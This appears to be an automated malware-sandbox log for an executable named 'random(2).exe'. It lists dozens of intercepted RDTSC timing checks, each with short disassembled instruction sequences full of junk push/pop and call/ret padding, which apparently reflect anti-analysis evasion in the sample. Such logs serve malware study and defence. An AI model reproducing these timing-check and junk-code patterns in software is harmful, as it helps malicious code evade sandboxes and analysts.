Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604DB0 second address: 604DBA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2944535536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604F17 second address: 604F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F29453582E3h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F29453582E5h 0x00000018 pop ebx 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F29453582DAh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 607B9B second address: 607B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 60B001 second address: 60B00B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29453582D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 60B092 second address: 60B098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 60B1EB second address: 60B1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 60B1EF second address: 60B1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 612412 second address: 612425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29453582DEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 612425 second address: 61244D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2944535536h 0x00000009 jmp 00007F2944535547h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61244D second address: 612451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6111E3 second address: 6111ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2944535536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6111ED second address: 611205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29453582DEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 611205 second address: 611209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6118AD second address: 6118B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6118B8 second address: 6118BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6118BE second address: 6118C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6119D4 second address: 6119D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 611C93 second address: 611CA0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 611F1A second address: 611F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 611F37 second address: 611F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 611F3D second address: 611F60 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2944535546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F2944535558h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 611F60 second address: 611F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnl 00007F29453582D6h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6120C8 second address: 612105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535543h 0x00000007 push esi 0x00000008 jmp 00007F294453553Ch 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jl 00007F2944535544h 0x00000017 jmp 00007F294453553Eh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 615A51 second address: 615A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61D1FD second address: 61D219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 jmp 00007F2944535545h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61D219 second address: 61D21E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61D21E second address: 61D224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61D224 second address: 61D235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61D235 second address: 61D23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61BF57 second address: 61BF5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61BF5D second address: 61BF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61BF63 second address: 61BF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61C4B4 second address: 61C4B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61C4B8 second address: 61C4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61C8FA second address: 61C914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F294453553Fh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61CA9A second address: 61CAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61CAA0 second address: 61CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61CAA4 second address: 61CAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5C2E11 second address: 5C2E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61D09B second address: 61D09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 61D09F second address: 61D0AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F2944535536h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 622083 second address: 6220A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F29453582E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F29453582E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6220A6 second address: 6220AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 622418 second address: 62241F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6226DC second address: 6226EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jg 00007F2944535536h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6226EC second address: 6226F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 623032 second address: 623038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 623038 second address: 623041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DFFDA second address: 5DFFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DFFE0 second address: 5DFFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0575 second address: 5E0598 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F2944535543h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0598 second address: 5E059E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E059E second address: 5E05C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0768 second address: 5E076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E076C second address: 5E0796 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 or cx, 4F13h 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F2944535546h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0A56 second address: 5E0A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F29453582D8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push edx 0x00000022 movzx ecx, bx 0x00000025 pop ecx 0x00000026 push 00000004h 0x00000028 adc edi, 1B2D94B8h 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0FB9 second address: 5E0FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0FBF second address: 5E0FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0FC3 second address: 5E0FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E120C second address: 5E125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 adc cl, 0000001Ch 0x0000000c lea eax, dword ptr [ebp+12486CCDh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F29453582D8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c stc 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jnc 00007F29453582D6h 0x00000037 jmp 00007F29453582E2h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E125F second address: 5E1265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E1265 second address: 5E1276 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E1276 second address: 5C2E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D1A22h], edi 0x0000000d lea eax, dword ptr [ebp+12486C89h] 0x00000013 mov dl, bh 0x00000015 push eax 0x00000016 jno 00007F294453553Ah 0x0000001c mov dword ptr [esp], eax 0x0000001f mov ecx, dword ptr [ebp+122D3696h] 0x00000025 call dword ptr [ebp+122D1AADh] 0x0000002b push edx 0x0000002c jnc 00007F2944535538h 0x00000032 push eax 0x00000033 push edx 0x00000034 jc 00007F2944535536h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 629F5F second address: 629F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62D6DC second address: 62D6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62D6E2 second address: 62D70D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29453582DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F29453582E9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62D871 second address: 62D87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2944535538h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62D87D second address: 62D893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29453582E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62DA1D second address: 62DA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62DA27 second address: 62DA2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62DA2D second address: 62DA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62DB4F second address: 62DB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 62DB65 second address: 62DB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 58CA54 second address: 58CA5E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 634871 second address: 63488A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007F2944535541h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639750 second address: 63975A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29453582D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 63975A second address: 639785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F294453553Ch 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F2944535542h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639B54 second address: 639B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F29453582D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639B5E second address: 639B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639CDC second address: 639CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DAh 0x00000009 jp 00007F29453582D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639E33 second address: 639E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535541h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E0C47 second address: 5E0CAC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29453582D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F29453582D8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D178Dh], esi 0x0000002b mov ebx, dword ptr [ebp+12486CC8h] 0x00000031 mov ecx, dword ptr [ebp+122D373Ah] 0x00000037 add eax, ebx 0x00000039 sbb dl, FFFFFFE8h 0x0000003c jmp 00007F29453582E7h 0x00000041 nop 0x00000042 jo 00007F29453582E0h 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639F7C second address: 639F8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2944535536h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639F8C second address: 639F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 639F90 second address: 639F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 63A0E3 second address: 63A0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 63C695 second address: 63C699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 640994 second address: 6409BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jne 00007F29453582E8h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6409BB second address: 6409DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2944535546h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6409DA second address: 6409DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 63FD3E second address: 63FD60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F2944535536h 0x0000000b jmp 00007F294453553Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F2944535536h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 63FD60 second address: 63FD9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F29453582EAh 0x0000000f jmp 00007F29453582E4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F29453582D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 63FD9F second address: 63FDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64007A second address: 64009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F29453582F0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
